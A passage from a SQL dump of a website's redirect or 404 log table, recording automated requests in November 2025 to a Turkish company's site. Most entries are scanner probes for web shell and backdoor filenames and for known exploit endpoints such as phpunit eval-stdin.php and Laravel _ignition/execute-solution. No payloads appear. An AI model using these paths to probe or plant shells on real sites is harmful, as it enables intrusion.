00:00:00',301),(49344,'http://www.3s-technologies.com.tr/tr/blox.php',NULL,'','',1,0,'2025-11-14 18:09:14','0000-00-00 00:00:00',301),(49345,'http://www.3s-technologies.com.tr/tr/iko.php',NULL,'','',2,0,'2025-11-14 18:09:16','0000-00-00 00:00:00',301),(49346,'http://www.3s-technologies.com.tr/tr/miso.php',NULL,'','',1,0,'2025-11-14 18:09:17','0000-00-00 00:00:00',301),(49347,'http://www.3s-technologies.com.tr/tr/moie.php',NULL,'','',1,0,'2025-11-14 18:09:18','0000-00-00 00:00:00',301),(49348,'http://www.3s-technologies.com.tr/tr/shelp.php',NULL,'','',1,0,'2025-11-14 18:09:19','0000-00-00 00:00:00',301),(49349,'http://www.3s-technologies.com.tr/tr/siln.php',NULL,'','',1,0,'2025-11-14 18:09:20','0000-00-00 00:00:00',301),(49350,'http://www.3s-technologies.com.tr/tr/sko.php',NULL,'','',4,0,'2025-11-14 18:09:21','0000-00-00 00:00:00',301),(49351,'http://www.3s-technologies.com.tr/tr/wp-gif.php',NULL,'','',1,0,'2025-11-14 18:09:23','0000-00-00 00:00:00',301),(49352,'http://www.3s-technologies.com.tr/tr/rrr.php',NULL,'','',1,0,'2025-11-14 18:09:25','0000-00-00 00:00:00',301),(49353,'http://www.3s-technologies.com.tr/tr/tj.php',NULL,'','',1,0,'2025-11-14 18:09:26','0000-00-00 00:00:00',301),(49354,'http://www.3s-technologies.com.tr/tr/vansec.php',NULL,'','',1,0,'2025-11-14 18:09:27','0000-00-00 00:00:00',301),(49355,'http://www.3s-technologies.com.tr/tr/ss.php',NULL,'','',5,0,'2025-11-14 18:09:29','0000-00-00 00:00:00',301),(49356,'http://www.3s-technologies.com.tr/tr/wp-is.php',NULL,'','',6,0,'2025-11-14 18:09:30','0000-00-00 00:00:00',301),(49357,'http://www.3s-technologies.com.tr/tr/scx.php7',NULL,'','',2,0,'2025-11-14 18:09:32','0000-00-00 00:00:00',301),(49358,'http://www.3s-technologies.com.tr/tr/csv.php',NULL,'','',1,0,'2025-11-14 18:09:36','0000-00-00 00:00:00',301),(49359,'http://www.3s-technologies.com.tr/tr/abc.php',NULL,'','',12,0,'2025-11-14 18:09:38','0000-00-00 00:00:00',301),(49360,'http://www.3s-technologies.com.tr/tr/wpc1.php',NULL,'','',1,0,'2025-11-14 18:09:39','0000-00-00 00:00:00',301),(49361,'http://www.3s-technologies.com.tr/tr/raw.php',NULL,'','',6,0,'2025-11-14 18:09:41','0000-00-00 00:00:00',301),(49362,'http://www.3s-technologies.com.tr/tr/xpas22.php',NULL,'','',1,0,'2025-11-14 18:09:44','0000-00-00 00:00:00',301),(49363,'http://www.3s-technologies.com.tr/tr/wp1.php',NULL,'','',7,0,'2025-11-14 18:09:45','0000-00-00 00:00:00',301),(49364,'http://www.3s-technologies.com.tr/tr/eauu.php',NULL,'','',2,0,'2025-11-14 18:09:46','0000-00-00 00:00:00',301),(49365,'http://www.3s-technologies.com.tr/tr/tmpls.php',NULL,'','',2,0,'2025-11-14 18:09:49','0000-00-00 00:00:00',301),(49366,'http://www.3s-technologies.com.tr/tr/ae.php',NULL,'','',2,0,'2025-11-14 18:09:51','0000-00-00 00:00:00',301),(49367,'http://www.3s-technologies.com.tr/tr/smpx.php',NULL,'','',1,0,'2025-11-14 18:09:52','0000-00-00 00:00:00',301),(49368,'http://www.3s-technologies.com.tr/tr/wp-asd.php',NULL,'','',1,0,'2025-11-14 18:09:53','0000-00-00 00:00:00',301),(49369,'http://www.3s-technologies.com.tr/tr/class5.php',NULL,'','',1,0,'2025-11-14 18:09:54','0000-00-00 00:00:00',301),(49370,'http://www.3s-technologies.com.tr/tr/yas.php',NULL,'','',4,0,'2025-11-14 18:09:55','0000-00-00 00:00:00',301),(49371,'http://www.3s-technologies.com.tr/tr/yanki.php',NULL,'','',1,0,'2025-11-14 18:09:56','0000-00-00 00:00:00',301),(49372,'http://www.3s-technologies.com.tr/tr/g7y.php',NULL,'','',1,0,'2025-11-14 18:09:57','0000-00-00 00:00:00',301),(49373,'http://www.3s-technologies.com.tr/tr/yasnu.php',NULL,'','',1,0,'2025-11-14 18:09:59','0000-00-00 00:00:00',301),(49374,'http://www.3s-technologies.com.tr/tr/wio.php',NULL,'','',2,0,'2025-11-14 18:10:01','0000-00-00 00:00:00',301),(49375,'http://www.3s-technologies.com.tr/tr/oswkk.php',NULL,'','',1,0,'2025-11-14 18:10:02','0000-00-00 00:00:00',301),(49376,'http://www.3s-technologies.com.tr/tr/rex.php',NULL,'','',1,0,'2025-11-14 18:10:03','0000-00-00 00:00:00',301),(49377,'http://www.3s-technologies.com.tr/tr/aj.php',NULL,'','',1,0,'2025-11-14 18:10:04','0000-00-00 00:00:00',301),(49378,'http://www.3s-technologies.com.tr/tr/snus.php',NULL,'','',1,0,'2025-11-14 18:10:05','0000-00-00 00:00:00',301),(49379,'http://www.3s-technologies.com.tr/tr/api137.php',NULL,'','',1,0,'2025-11-14 18:10:09','0000-00-00 00:00:00',301),(49380,'http://www.3s-technologies.com.tr/tr/class629.php',NULL,'','',2,0,'2025-11-14 18:10:10','0000-00-00 00:00:00',301),(49381,'http://www.3s-technologies.com.tr/tr/wp-x7.php',NULL,'','',4,0,'2025-11-14 18:10:11','0000-00-00 00:00:00',301),(49382,'http://www.3s-technologies.com.tr/tr/wp670.php',NULL,'','',1,0,'2025-11-14 18:10:12','0000-00-00 00:00:00',301),(49383,'http://www.3s-technologies.com.tr/tr/sanskrit.php',NULL,'','',5,0,'2025-11-14 18:10:14','0000-00-00 00:00:00',301),(49384,'http://www.3s-technologies.com.tr/tr/jq.php',NULL,'','',2,0,'2025-11-14 18:10:15','0000-00-00 00:00:00',301),(49385,'http://www.3s-technologies.com.tr/tr/x7.php',NULL,'','',6,0,'2025-11-14 18:10:16','0000-00-00 00:00:00',301),(49386,'http://www.3s-technologies.com.tr/tr/zex.php',NULL,'','',1,0,'2025-11-14 18:10:17','0000-00-00 00:00:00',301),(49387,'http://www.3s-technologies.com.tr/tr/zxin.php',NULL,'','',5,0,'2025-11-14 18:10:18','0000-00-00 00:00:00',301),(49388,'http://www.3s-technologies.com.tr/tr/enkkk.php',NULL,'','',1,0,'2025-11-14 18:10:21','0000-00-00 00:00:00',301),(49389,'http://www.3s-technologies.com.tr/tr/ext.php',NULL,'','',5,0,'2025-11-14 18:10:22','0000-00-00 00:00:00',301),(49390,'http://www.3s-technologies.com.tr/tr/fe5.php',NULL,'','',10,0,'2025-11-14 18:10:23','0000-00-00 00:00:00',301),(49391,'http://www.3s-technologies.com.tr/tr/wp-freya.php',NULL,'','',2,0,'2025-11-14 18:10:27','0000-00-00 00:00:00',301),(49392,'http://www.3s-technologies.com.tr/tr/ex.php',NULL,'','',3,0,'2025-11-14 18:10:29','0000-00-00 00:00:00',301),(49393,'http://www.3s-technologies.com.tr/tr/lock1.php',NULL,'','',2,0,'2025-11-14 18:10:30','0000-00-00 00:00:00',301),(49394,'http://www.3s-technologies.com.tr/tr/bes.php',NULL,'','',2,0,'2025-11-14 18:10:32','0000-00-00 00:00:00',301),(49395,'http://www.3s-technologies.com.tr/tr/wp-swa.php',NULL,'','',1,0,'2025-11-14 18:10:33','0000-00-00 00:00:00',301),(49396,'http://www.3s-technologies.com.tr/tr/aua.php',NULL,'','',2,0,'2025-11-14 18:10:45','0000-00-00 00:00:00',301),(49397,'http://www.3s-technologies.com.tr/tr/class9.php',NULL,'','',7,0,'2025-11-14 18:10:48','0000-00-00 00:00:00',301),(49398,'http://www.3s-technologies.com.tr/tr/witmm.php',NULL,'','',2,0,'2025-11-14 18:10:51','0000-00-00 00:00:00',301),(49399,'http://www.3s-technologies.com.tr/tr/lo.php',NULL,'','',4,0,'2025-11-14 18:10:53','0000-00-00 00:00:00',301),(49400,'http://www.3s-technologies.com.tr/tr/vxrl.php',NULL,'','',3,0,'2025-11-14 18:10:53','0000-00-00 00:00:00',301),(49401,'http://www.3s-technologies.com.tr/tr/vxonb.php',NULL,'','',1,0,'2025-11-14 18:10:54','0000-00-00 00:00:00',301),(49402,'http://www.3s-technologies.com.tr/tr/wozxsh.php',NULL,'','',1,0,'2025-11-14 18:10:55','0000-00-00 00:00:00',301),(49403,'http://www.3s-technologies.com.tr/tr/whf.php',NULL,'','',1,0,'2025-11-14 18:10:56','0000-00-00 00:00:00',301),(49404,'http://www.3s-technologies.com.tr/tr/bkxzo.php',NULL,'','',3,0,'2025-11-14 18:10:57','0000-00-00 00:00:00',301),(49405,'http://www.3s-technologies.com.tr/tr/error1.php',NULL,'','',2,0,'2025-11-14 18:10:59','0000-00-00 00:00:00',301),(49406,'http://www.3s-technologies.com.tr/tr/xtt.php',NULL,'','',4,0,'2025-11-14 18:11:00','0000-00-00 00:00:00',301),(49407,'http://www.3s-technologies.com.tr/tr/wcas.php',NULL,'','',4,0,'2025-11-14 18:11:02','0000-00-00 00:00:00',301),(49408,'http://www.3s-technologies.com.tr/tr/acp.php',NULL,'','',9,0,'2025-11-14 18:11:05','0000-00-00 00:00:00',301),(49409,'http://www.3s-technologies.com.tr/tr/awh77.php',NULL,'','',1,0,'2025-11-14 18:11:06','0000-00-00 00:00:00',301),(49410,'http://www.3s-technologies.com.tr/tr/nax.php',NULL,'','',2,0,'2025-11-14 18:11:07','0000-00-00 00:00:00',301),(49411,'http://www.3s-technologies.com.tr/tr/wolv2.php',NULL,'','',5,0,'2025-11-14 18:11:08','0000-00-00 00:00:00',301),(49412,'http://www.3s-technologies.com.tr/tr/mtvcrew.php',NULL,'','',1,0,'2025-11-14 18:11:09','0000-00-00 00:00:00',301),(49413,'http://www.3s-technologies.com.tr/tr/twso.php',NULL,'','',1,0,'2025-11-14 18:11:10','0000-00-00 00:00:00',301),(49414,'http://www.3s-technologies.com.tr/tr/144.php',NULL,'','',3,0,'2025-11-14 18:11:11','0000-00-00 00:00:00',301),(49415,'http://www.3s-technologies.com.tr/tr/exhitrgp.php',NULL,'','',1,0,'2025-11-14 18:11:12','0000-00-00 00:00:00',301),(49416,'http://www.3s-technologies.com.tr/tr/n3.php',NULL,'','',5,0,'2025-11-14 18:11:13','0000-00-00 00:00:00',301),(49417,'https://www.3s-technologies.com.tr/tr/pub/rf',NULL,'https://www.3s-technologies.com.tr/pub/rf','',2,0,'2025-11-14 23:07:53','0000-00-00 00:00:00',301),(49418,'https://3s-technologies.com.tr/tr/\"/components/com_virtuemart/assets/js/vmprices.js?vmver=1ca80efd\"',NULL,'','',14,0,'2025-11-15 05:38:21','0000-00-00 00:00:00',301),(49419,'https://3s-technologies.com.tr/tr/.gitlab-ci.yml',NULL,'','',4,0,'2025-11-15 05:40:23','0000-00-00 00:00:00',301),(49420,'https://mail.3s-technologies.com.tr/tr/favicon.png',NULL,'','',13,0,'2025-11-15 15:01:12','0000-00-00 00:00:00',301),(49421,'http://3s-technologies.com.tr/tr/themes/fitnessbase/404.php?ok',NULL,'','',2,0,'2025-11-16 00:07:58','0000-00-00 00:00:00',301),(49422,'http://3s-technologies.com.tr/tr/wp-content/postnews.php',NULL,'http://3s-technologies.com.tr/wp-content/postnews.php','',26,0,'2025-11-16 04:19:00','0000-00-00 00:00:00',301),(49423,'http://3s-technologies.com.tr/tr/wp-admin/postnews.php',NULL,'http://3s-technologies.com.tr/wp-admin/postnews.php','',26,0,'2025-11-16 04:19:00','0000-00-00 00:00:00',301),(49424,'http://www.3s-technologies.com.tr/tr/actuator/threaddump',NULL,'http://www.3s-technologies.com.tr/actuator/threaddump','',1,0,'2025-11-16 17:24:14','0000-00-00 00:00:00',301),(49425,'https://www.3s-technologies.com.tr/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',2,0,'2025-11-16 20:33:37','0000-00-00 00:00:00',301),(49426,'https://www.3s-technologies.com.tr/tr/vendor/laravel-filemanager/js/script.js',NULL,'https://www.3s-technologies.com.tr/vendor/laravel-filemanager/js/script.js','',1,0,'2025-11-16 20:33:37','0000-00-00 00:00:00',301),(49427,'https://www.3s-technologies.com.tr/tr/public/vendor/laravel-filemanager/js/script.js',NULL,'https://www.3s-technologies.com.tr/public/vendor/laravel-filemanager/js/script.js','',1,0,'2025-11-16 20:33:38','0000-00-00 00:00:00',301),(49428,'https://www.3s-technologies.com.tr/tr/_ignition/execute-solution',NULL,'https://www.3s-technologies.com.tr/_ignition/execute-solution','',1,0,'2025-11-16 20:33:40','0000-00-00 00:00:00',301),(49429,'https://www.3s-technologies.com.tr/tr/public/_ignition/execute-solution',NULL,'https://www.3s-technologies.com.tr/public/_ignition/execute-solution','',1,0,'2025-11-16 20:33:40','0000-00-00 00:00:00',301),(49430,'http://3s-technologies.com.tr/en/form.php',NULL,'https://www.google.co.uk/','',8,0,'2025-11-17 19:19:51','0000-00-00 00:00:00',301),(49431,'http://3s-technologies.com.tr/en/aa.php',NULL,'https://www.yahoo.com/','',145,0,'2025-11-17 19:19:52','0000-00-00 00:00:00',301),(49432,'http://3s-technologies.com.tr/en/abcd.php',NULL,'https://duckduckgo.com/','',193,0,'2025-11-17 19:19:53','0000-00-00 00:00:00',301),(49433,'http://3s-technologies.com.tr/en/.__info.php',NULL,'https://www.google.fr/','',7,0,'2025-11-17 19:19:54','0000-00-00 00:00:00',301),(49434,'http://3s-technologies.com.tr/en/.bod/.ll/ss.php',NULL,'https://www.google.fr/','',2,0,'2025-11-17 19:19:55','0000-00-00 00:00:00',301),(49435,'http://3s-technologies.com.tr/en/.well-known/.qiodetme.php',NULL,'https://www.google.fr/','',2,0,'2025-11-17 19:19:56','0000-00-00 00:00:00',301),(49436,'http://3s-technologies.com.tr/en/alfa_data/admin.php',NULL,'https://www.google.co.uk/','',4,0,'2025-11-17 19:19:59','0000-00-00 00:00:00',301),(49437,'http://3s-technologies.com.tr/en/aaa.php',NULL,'https://www.google.fr/','',7,0,'2025-11-17 19:20:00','0000-00-00 00:00:00',301),(49438,'http://3s-technologies.com.tr/en/admin/admin.php',NULL,'https://www.google.de/','',5,0,'2025-11-17 19:20:01','0000-00-00 00:00:00',301),(49439,'http://3s-technologies.com.tr/en/akcc.php',NULL,'https://www.google.com/','',176,0,'2025-11-17 19:20:03','0000-00-00 00:00:00',301),(49440,'http://3s-technologies.com.tr/en/build.php',NULL,'https://www.yahoo.com/','',7,0,'2025-11-17 19:20:04','0000-00-00 00:00:00',301),(49441,'http://3s-technologies.com.tr/en/buy.php',NULL,'https://www.yahoo.com/','',135,0,'2025-11-17 19:20:05','0000-00-00 00:00:00',301),(49442,'http://3s-technologies.com.tr/en/classwithtostring.php',NULL,'https://www.yahoo.com/','',190,0,'2025-11-17 19:20:07','0000-00-00 00:00:00',301),(49443,'http://3s-technologies.com.tr/en/flower.php',NULL,'https://www.google.co.uk/','',22,0,'2025-11-17 19:20:11','0000-00-00 00:00:00',301),(49444,'http://3s-technologies.com.tr/en/function/function.php',NULL,'https://www.google.com/','',36,0,'2025-11-17 19:20:12','0000-00-00 00:00:00',301),(49445,'http://3s-technologies.com.tr/en/go.php',NULL,'https://www.google.de/','',4,0,'2025-11-17 19:20:13','0000-00-00 00:00:00',301),(49446,'http://3s-technologies.com.tr/en/images/index.php',NULL,'https://duckduckgo.com/','',38,0,'2025-11-17 19:20:14','0000-00-00 00:00:00',301),(49447,'http://3s-technologies.com.tr/en/images/images/about.php',NULL,'https://www.yahoo.com/','',11,0,'2025-11-17 19:20:15','0000-00-00 00:00:00',301),(49448,'http://3s-technologies.com.tr/en/ioxi-o.php',NULL,'https://www.google.co.uk/','',205,0,'2025-11-17 19:20:15','0000-00-00 00:00:00',301),(49449,'http://3s-technologies.com.tr/en/moon.php',NULL,'https://duckduckgo.com/','',52,0,'2025-11-17 19:20:17','0000-00-00 00:00:00',301),(49450,'http://3s-technologies.com.tr/en/nc4.php',NULL,'https://www.bing.com/','',15,0,'2025-11-17 19:20:18','0000-00-00 00:00:00',301),(49451,'http://3s-technologies.com.tr/en/wp-admin/about.php',NULL,'https://www.google.de/','',10,0,'2025-11-17 19:20:18','0000-00-00 00:00:00',301),(49452,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/index.php',NULL,'https://www.bing.com/','',27,0,'2025-11-17 19:20:19','0000-00-00 00:00:00',301),(49453,'http://3s-technologies.com.tr/en/wp-content/upgrade/index.php',NULL,'https://www.bing.com/','',119,0,'2025-11-17 19:20:20','0000-00-00 00:00:00',301),(49454,'http://3s-technologies.com.tr/en/wp-includes/style-engine/index.php',NULL,'https://www.google.co.uk/','',72,0,'2025-11-17 19:20:21','0000-00-00 00:00:00',301),(49455,'http://3s-technologies.com.tr/en/wp-content/uploads/admin.php',NULL,'https://www.google.fr/','',22,0,'2025-11-17 19:20:23','0000-00-00 00:00:00',301),(49456,'http://3s-technologies.com.tr/en/wp-good.php',NULL,'https://www.bing.com/','',178,0,'2025-11-17 19:20:24','0000-00-00 00:00:00',301),(49457,'http://3s-technologies.com.tr/en/asasx.php',NULL,'https://duckduckgo.com/','',53,0,'2025-11-17 19:20:27','0000-00-00 00:00:00',301),(49458,'http://3s-technologies.com.tr/en/file2.php',NULL,'https://duckduckgo.com/','',16,0,'2025-11-17 19:20:30','0000-00-00 00:00:00',301),(49459,'http://3s-technologies.com.tr/en/wp-content/plugins/yanierin/akcc.php',NULL,'https://www.google.co.uk/','',17,0,'2025-11-17 19:20:31','0000-00-00 00:00:00',301),(49460,'http://3s-technologies.com.tr/en/wp-content/uploads/index.php',NULL,'https://duckduckgo.com/','',88,0,'2025-11-17 19:20:32','0000-00-00 00:00:00',301),(49461,'http://3s-technologies.com.tr/en/wp-content/wp-conflg.php',NULL,'https://www.google.com/','',17,0,'2025-11-17 19:20:33','0000-00-00 00:00:00',301),(49462,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-excerpt/alfa-rex.php',NULL,'','',1,0,'2025-11-18 14:05:46','0000-00-00 00:00:00',301),(49463,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-excerpt/index.php',NULL,'','',1,0,'2025-11-18 14:05:47','0000-00-00 00:00:00',301),(49464,'http://3s-technologies.com.tr/tr/wp-content/plugins/zwso.php',NULL,'','',1,0,'2025-11-18 14:05:53','0000-00-00 00:00:00',301),(49465,'http://3s-technologies.com.tr/tr/beta',NULL,'','',2,0,'2025-11-18 16:42:31','0000-00-00 00:00:00',301),(49466,'http://3s-technologies.com.tr/tr/gul.php',NULL,'','',4,0,'2025-11-19 01:23:52','0000-00-00 00:00:00',301),(49467,'http://3s-technologies.com.tr/tr/ker.php',NULL,'','',2,0,'2025-11-19 01:23:55','0000-00-00 00:00:00',301),(49468,'http://3s-technologies.com.tr/tr/public/new2.php',NULL,'','',2,0,'2025-11-19 01:23:55','0000-00-00 00:00:00',301),(49469,'http://3s-technologies.com.tr/tr/nok.php',NULL,'','',2,0,'2025-11-19 01:23:58','0000-00-00 00:00:00',301),(49470,'http://3s-technologies.com.tr/tr/dop.php',NULL,'','',2,0,'2025-11-19 01:23:59','0000-00-00 00:00:00',301),(49471,'http://3s-technologies.com.tr/tr/ad24f.php',NULL,'','',2,0,'2025-11-19 01:23:59','0000-00-00 00:00:00',301),(49472,'http://3s-technologies.com.tr/tr/wui.php',NULL,'','',4,0,'2025-11-19 01:24:00','0000-00-00 00:00:00',301),(49473,'http://3s-technologies.com.tr/tr/wto.php',NULL,'','',6,0,'2025-11-19 01:24:01','0000-00-00 00:00:00',301),(49474,'http://3s-technologies.com.tr/tr/gib.php',NULL,'','',13,0,'2025-11-19 01:24:02','0000-00-00 00:00:00',301),(49475,'http://3s-technologies.com.tr/tr/73106.php',NULL,'','',2,0,'2025-11-19 01:24:02','0000-00-00 00:00:00',301),(49476,'http://3s-technologies.com.tr/tr/show/asa.php',NULL,'','',4,0,'2025-11-19 01:24:03','0000-00-00 00:00:00',301),(49477,'http://3s-technologies.com.tr/tr/skj.php',NULL,'','',2,0,'2025-11-19 01:24:04','0000-00-00 00:00:00',301),(49478,'http://3s-technologies.com.tr/tr/wle.php',NULL,'','',2,0,'2025-11-19 01:24:06','0000-00-00 00:00:00',301),(49479,'http://3s-technologies.com.tr/tr/lok.php',NULL,'','',4,0,'2025-11-19 01:24:06','0000-00-00 00:00:00',301),(49480,'http://3s-technologies.com.tr/tr/wp-admin/new2.php',NULL,'','',3,0,'2025-11-19 01:24:08','0000-00-00 00:00:00',301),(49481,'http://3s-technologies.com.tr/tr/hum.php',NULL,'','',4,0,'2025-11-19 01:24:10','0000-00-00 00:00:00',301),(49482,'http://3s-technologies.com.tr/tr/tua.php',NULL,'','',4,0,'2025-11-19 01:24:10','0000-00-00 00:00:00',301),(49483,'http://3s-technologies.com.tr/tr/hey.php',NULL,'','',16,0,'2025-11-19 01:24:11','0000-00-00 00:00:00',301),(49484,'http://3s-technologies.com.tr/tr/hzz.php',NULL,'','',14,0,'2025-11-19 01:24:12','0000-00-00 00:00:00',301),(49485,'http://3s-technologies.com.tr/tr/lov.php',NULL,'','',4,0,'2025-11-19 01:24:13','0000-00-00 00:00:00',301),(49486,'http://3s-technologies.com.tr/tr/has.php',NULL,'','',3,0,'2025-11-19 01:24:13','0000-00-00 00:00:00',301),(49487,'http://3s-technologies.com.tr/tr/ooj.php',NULL,'','',3,0,'2025-11-19 01:24:14','0000-00-00 00:00:00',301),(49488,'http://3s-technologies.com.tr/tr/zuk.php',NULL,'','',4,0,'2025-11-19 01:24:16','0000-00-00 00:00:00',301),(49489,'http://3s-technologies.com.tr/tr/ink.php',NULL,'','',4,0,'2025-11-19 01:24:16','0000-00-00 00:00:00',301),(49490,'http://3s-technologies.com.tr/tr/jju.php',NULL,'','',5,0,'2025-11-19 01:24:17','0000-00-00 00:00:00',301),(49491,'http://3s-technologies.com.tr/tr/zil.php',NULL,'','',2,0,'2025-11-19 01:24:17','0000-00-00 00:00:00',301),(49492,'http://3s-technologies.com.tr/tr/pes.php',NULL,'','',2,0,'2025-11-19 01:24:18','0000-00-00 00:00:00',301),(49493,'http://3s-technologies.com.tr/tr/about25.php',NULL,'','',3,0,'2025-11-19 22:04:18','0000-00-00 00:00:00',301),(49494,'http://3s-technologies.com.tr/tr/zc-729.php',NULL,'','',8,0,'2025-11-19 22:04:20','0000-00-00 00:00:00',301),(49495,'http://3s-technologies.com.tr/tr/muscovadite.php',NULL,'','',1,0,'2025-11-19 22:04:22','0000-00-00 00:00:00',301),(49496,'http://3s-technologies.com.tr/tr/nonesoterically.php',NULL,'','',4,0,'2025-11-19 22:04:23','0000-00-00 00:00:00',301),(49497,'http://3s-technologies.com.tr/tr/yuk.php',NULL,'','',1,0,'2025-11-19 22:04:24','0000-00-00 00:00:00',301),(49498,'http://3s-technologies.com.tr/tr/contrller.php',NULL,'','',5,0,'2025-11-19 22:04:24','0000-00-00 00:00:00',301),(49499,'http://3s-technologies.com.tr/tr/starry.php',NULL,'','',1,0,'2025-11-19 22:04:25','0000-00-00 00:00:00',301),(49500,'http://3s-technologies.com.tr/tr/unwattled.php',NULL,'','',1,0,'2025-11-19 22:04:28','0000-00-00 00:00:00',301),(49501,'http://3s-technologies.com.tr/tr/ww1.php',NULL,'','',46,0,'2025-11-19 22:04:29','0000-00-00 00:00:00',301),(49502,'http://3s-technologies.com.tr/tr/diesinker.php',NULL,'','',1,0,'2025-11-19 22:04:32','0000-00-00 00:00:00',301),(49503,'http://3s-technologies.com.tr/tr/dinah.php',NULL,'','',1,0,'2025-11-19 22:04:32','0000-00-00 00:00:00',301),(49504,'http://3s-technologies.com.tr/tr/washland.php',NULL,'','',1,0,'2025-11-19 22:04:33','0000-00-00 00:00:00',301),(49505,'http://3s-technologies.com.tr/tr/prototheria.php',NULL,'','',1,0,'2025-11-19 22:04:34','0000-00-00 00:00:00',301),(49506,'http://3s-technologies.com.tr/tr/microspore.php',NULL,'','',1,0,'2025-11-19 22:04:34','0000-00-00 00:00:00',301),(49507,'http://3s-technologies.com.tr/tr/wpc2.php',NULL,'','',5,0,'2025-11-19 22:04:36','0000-00-00 00:00:00',301),(49508,'http://3s-technologies.com.tr/tr/speculative.php',NULL,'','',1,0,'2025-11-19 22:04:37','0000-00-00 00:00:00',301),(49509,'http://3s-technologies.com.tr/tr/hans.php',NULL,'','',5,0,'2025-11-19 22:04:38','0000-00-00 00:00:00',301),(49510,'http://3s-technologies.com.tr/tr/acholuria.php',NULL,'','',1,0,'2025-11-19 22:04:39','0000-00-00 00:00:00',301),(49511,'http://3s-technologies.com.tr/tr/ghreshttryu.php',NULL,'','',5,0,'2025-11-19 22:04:41','0000-00-00 00:00:00',301),(49512,'http://3s-technologies.com.tr/tr/aporrhiegma.php',NULL,'','',1,0,'2025-11-19 22:04:42','0000-00-00 00:00:00',301),(49513,'http://3s-technologies.com.tr/tr/byp8.php',NULL,'','',26,0,'2025-11-19 22:04:43','0000-00-00 00:00:00',301),(49514,'http://3s-technologies.com.tr/tr/clss.php',NULL,'','',26,0,'2025-11-19 22:04:43','0000-00-00 00:00:00',301),(49515,'http://3s-technologies.com.tr/tr/qaez.php56',NULL,'','',5,0,'2025-11-19 22:04:44','0000-00-00 00:00:00',301),(49516,'http://3s-technologies.com.tr/tr/lanbai.php',NULL,'','',1,0,'2025-11-19 22:04:45','0000-00-00 00:00:00',301),(49517,'http://3s-technologies.com.tr/tr/kcs.php',NULL,'','',6,0,'2025-11-19 22:04:47','0000-00-00 00:00:00',301),(49518,'http://3s-technologies.com.tr/tr/domains.php',NULL,'','',43,0,'2025-11-19 22:04:48','0000-00-00 00:00:00',301),(49519,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_ly8c.jpg',NULL,'https://www.3s-technologies.com.tr/en/products-en/smd-f%C4%B1r%C4%B1n/by,mf_name','',1,0,'2025-11-20 00:28:01','0000-00-00 00:00:00',301),(49520,'http://3s-technologies.com.tr/tr/dev1s.php',NULL,'','',22,0,'2025-11-20 01:52:27','0000-00-00 00:00:00',301),(49521,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/aduot.php',NULL,'','',2,0,'2025-11-20 01:52:28','0000-00-00 00:00:00',301),(49522,'http://3s-technologies.com.tr/tr/aduot.php',NULL,'','',2,0,'2025-11-20 01:52:29','0000-00-00 00:00:00',301),(49523,'http://3s-technologies.com.tr/tr/ar/mgsl.php',NULL,'','',4,0,'2025-11-20 01:52:30','0000-00-00 00:00:00',301),(49524,'http://3s-technologies.com.tr/tr/mgsl.php',NULL,'','',2,0,'2025-11-20 01:52:31','0000-00-00 00:00:00',301),(49525,'http://3s-technologies.com.tr/tr/glmiiqmk.php',NULL,'','',2,0,'2025-11-20 01:52:32','0000-00-00 00:00:00',301),(49526,'http://3s-technologies.com.tr/tr/wp-poose.php',NULL,'','',2,0,'2025-11-20 01:52:32','0000-00-00 00:00:00',301),(49527,'http://3s-technologies.com.tr/tr/wp-bugs.php',NULL,'','',4,0,'2025-11-20 01:52:33','0000-00-00 00:00:00',301),(49528,'http://3s-technologies.com.tr/tr/gl.php',NULL,'','',4,0,'2025-11-20 01:52:33','0000-00-00 00:00:00',301),(49529,'http://3s-technologies.com.tr/tr/pss.php',NULL,'','',2,0,'2025-11-20 01:52:34','0000-00-00 00:00:00',301),(49530,'http://3s-technologies.com.tr/tr/wp-content/aws.php',NULL,'','',2,0,'2025-11-20 01:52:35','0000-00-00 00:00:00',301),(49531,'http://3s-technologies.com.tr/tr/0xby.php',NULL,'','',2,0,'2025-11-20 01:52:38','0000-00-00 00:00:00',301),(49532,'http://3s-technologies.com.tr/tr/hel.php',NULL,'','',3,0,'2025-11-20 01:52:39','0000-00-00 00:00:00',301),(49533,'http://3s-technologies.com.tr/tr/areak1.php',NULL,'','',14,0,'2025-11-20 01:52:40','0000-00-00 00:00:00',301),(49534,'http://3s-technologies.com.tr/tr/wsop.php',NULL,'','',2,0,'2025-11-20 01:52:40','0000-00-00 00:00:00',301),(49535,'http://3s-technologies.com.tr/tr/met2.php',NULL,'','',2,0,'2025-11-20 01:52:41','0000-00-00 00:00:00',301),(49536,'http://3s-technologies.com.tr/tr/undel.php',NULL,'','',2,0,'2025-11-20 01:52:43','0000-00-00 00:00:00',301),(49537,'http://3s-technologies.com.tr/tr/update/undel.php',NULL,'','',1,0,'2025-11-20 01:52:43','0000-00-00 00:00:00',301),(49538,'http://3s-technologies.com.tr/tr/a4tech.php',NULL,'','',2,0,'2025-11-20 01:52:44','0000-00-00 00:00:00',301),(49539,'http://3s-technologies.com.tr/tr/wp-content/upgrade/a4tech.php',NULL,'','',2,0,'2025-11-20 01:52:44','0000-00-00 00:00:00',301),(49540,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/kopyası-gf-12ht.gif',NULL,'https://www.3s-technologies.com.tr/en/products-en/smd-f%C4%B1r%C4%B1n/by,mf_name','',1,0,'2025-11-20 06:16:47','0000-00-00 00:00:00',301),(49541,'http://3s-technologies.com.tr/en/new4.php',NULL,'https://www.google.de/','',1,0,'2025-11-20 14:28:28','0000-00-00 00:00:00',301),(49542,'http://3s-technologies.com.tr/en/bolt.php',NULL,'https://www.google.co.uk/','',143,0,'2025-11-20 14:28:29','0000-00-00 00:00:00',301),(49543,'http://3s-technologies.com.tr/en/pow.php',NULL,'https://www.google.de/','',1,0,'2025-11-20 14:28:32','0000-00-00 00:00:00',301),(49544,'http://3s-technologies.com.tr/en/zuk.php',NULL,'https://www.google.de/','',1,0,'2025-11-20 14:28:33','0000-00-00 00:00:00',301),(49545,'http://3s-technologies.com.tr/en/fss.php',NULL,'https://www.google.co.uk/','',1,0,'2025-11-20 14:28:34','0000-00-00 00:00:00',301),(49546,'http://3s-technologies.com.tr/en/test1.php',NULL,'https://duckduckgo.com/','',10,0,'2025-11-20 14:28:35','0000-00-00 